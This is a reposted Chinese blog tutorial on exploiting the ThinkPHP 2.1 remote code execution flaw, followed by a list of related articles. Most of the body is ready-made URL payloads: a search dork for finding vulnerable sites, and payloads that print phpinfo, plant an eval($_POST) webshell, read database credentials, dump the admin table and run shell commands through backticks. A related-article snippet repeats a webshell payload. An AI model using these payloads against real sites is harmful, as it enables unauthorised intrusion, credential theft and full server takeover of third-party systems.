Thinkphp2.1漏洞利用

最新推荐文章于 2023-07-12 13:28:43 发布
转载 最新推荐文章于 2023-07-12 13:28:43 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/someone9/p/10186179.html
文章标签:

#php #操作系统 #数据库

本文介绍如何在ThinkPHP2.1版本中进行安全测试,包括输出phpinfo信息、获取版本详情、写入一句话木马及执行各种系统命令的方法。同时也展示了如何利用ThinkPHP的特性来查询数据库信息和执行操作系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

thinkphp2.1版本

Google语法:

inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

进行测试,输出phpinfo

index.php/Index/index/name/$%7B@phpinfo%28%29%7D

输出版本信息:

index.php/module/action/param1/${@print(THINK_VERSION)}

写入一句话

index.php/module/action/param1/${@print(eval($_POST[c]))}

 

 

 一些其他执行语句:

1.使用c方法,获取其他数据库 配置相关信息:c(db_name)、c(db_host)、c(db_user)、c(db_pwd)等 

/index.php/module/action/param1/$%7b@print(c(db_name))%7d

3.使用d方法或者m方法,查询其他数据库 ,最典型的使用方式var_dump(d(admin)->select()),能够查询出管理员信息,当然,表名需要猜一下,一般是admin,user等

/index.php/module/action/param1/$%7b@print(var_dump(d(admin)->select()))%7d

4.利用php在“·”(tab键上面的键,url编码后为%60)之间的内容可以当做命令执行的方式,不管是windows还是linux下,都可以执行cmd或者是shell命令。

index.php/module/action/param1/$%7b@print(%60dirls%60)%7d  ---------- 在windows下

index.php/module/action/param1/$%7b@print(%60ls%60)%7d -------------在linux下

转载于:https://www.cnblogs.com/someone9/p/10186179.html

php漏洞获得webshell权限,ThinkPHP 2.1 漏洞可拿webshell
weixin_30096321的博客
03-10 700
这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了 嗷哈哈晚上他和我聊 要我出比赛的有关题目 然后扔了个连接给我我看了下 系统还是以前的那个thinkph...
漏洞复现】[ThinkPHP]2-Rce
Mr_atopos的博客
05-22 895
在BUU上复现 [ThinkPHP]2-Rce
thinkphp2.1 中文web应用开发框架
11-11
thinkphp2.1 中文web应用开发框架 源码
Thinkphp2.1爆出重大安全漏洞
weixin_34261739的博客
04-01 616
thinkphp 2.1的版本 我们来分析下漏洞吧 官方发布了一个安全补丁 表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php   125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']...
thinkphp任意代码执行漏洞
收集盒 Book box
05-20 4035
http://site.com/index.php/module/action/param1/${@phpinfo()} 直接拿SHELL index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c lib/ThinkPHP/Vendor//Vendor/module/action/param1/$%7B@p
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 4413
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
thinkphp2.1
weixin_30480583的博客
06-21 155
thinkphp2.1 thinkphp框架结构 Common:公共文件,系统定义,系统函数和管理配置。 Lang:系统语言文件 Lib:系统基类库目录 Tpl:系统模块类目 Mode:框架模式扩展目录 Vendor:第三方类库目录 应用目录: Common:项目公共文件目录 Conf:配置目录 Lang:语言包 L...
ctf之php漏洞,ctf入门到Thinkphp2.x、3.0-3.1版代码执行漏洞分析
weixin_39738380的博客
04-01 811
前言:文章可能有点长,小弟不才,只能靠刷ctf来理解一些内容。若有不恰当之处,望大佬们不吝赐教。一、[BJDCTF2020]ZJCTF先做一道ctf压压惊:[BJDCTF2020]ZJCTF构建以下payload,进入if判断,并且进入include()函数?text=data://text/plain,I have a dream&file=php://filter/convert.ba...
ThinkPHP文件包含漏洞分析
include_voidmain的博客
12-10 2102
可见内容为从application\lang路径和think\lang路径加上我们URL中lang参数的内容,但是需要我们的此时lang参数为..\..\info.php但是在file列表的内容为info.php.php因此我们不能加上php的后缀。我们首先跟进range()方法:在App.php中调用range为Lang::range() 因此,range()此时直接return了self::$range此参数在detect中被URL的lang参数控制。
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7930
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
ThinkPHP2.1帮助文档
05-07
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业级应用开发而诞生的。
ThinkPHP2.1 完全开发手册
01-03
ThinkPHP2.1 完全开发手册 开发文档 原来的2.1版本的 有需要的支持下
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP2.2 任意代码执行漏洞 利用
weixin_34024034的博客
07-15 551
2019独角兽企业重金招聘Python工程师标准>>> ...
海豚php完全开发手册,ThinkPHP2.1完全开发手册
weixin_35427369的博客
03-10 246
资源来源网络,如果需要授权,请大家更换源码,模块仅供学习,如需商用请购买正版授权ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了五年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,众多的典型案例确保可以稳定用于商业以及门...
ThinkPHP2.1 0day实战
kendyhj9999的专栏
04-26 1790
http://www.hack80.com/thread-195-1-1.html
php开发接口路由控制版本,ThinkPHP 2.1 版本 URL 路由规则对比 2.0 版本的变更
weixin_29375669的博客
03-19 222
ThinkPHP 2.1 路由ThinkPHP 2.1 版本(包括 2.1RC 版本)启用了全新的 URL 路由定义规则,与 2.0 本版相比,有两个方面的区别:路由配置方式:支持 routes.php 文件配置与配置文件 Config.php 中使用 URL_ROUTE_RULES 选项进行配置路由配置规则。另外在 2.1 版本中,还解决了路由名称不能使用大写英文字符的 bug 。routes....
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 7022
ThinkPHP漏洞整理
ThinkPHP2.1 完整开发指南
"ThinkPHP2.1 完全开发手册" 《ThinkPHP2.1 完全开发手册》是针对ThinkPHP2.1版本的一份详尽的技术文档,由ThinkPHP文档小组编撰。这份手册包含了该框架在2.1版本的所有详细信息,旨在帮助开发者全面了解和熟练掌握...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值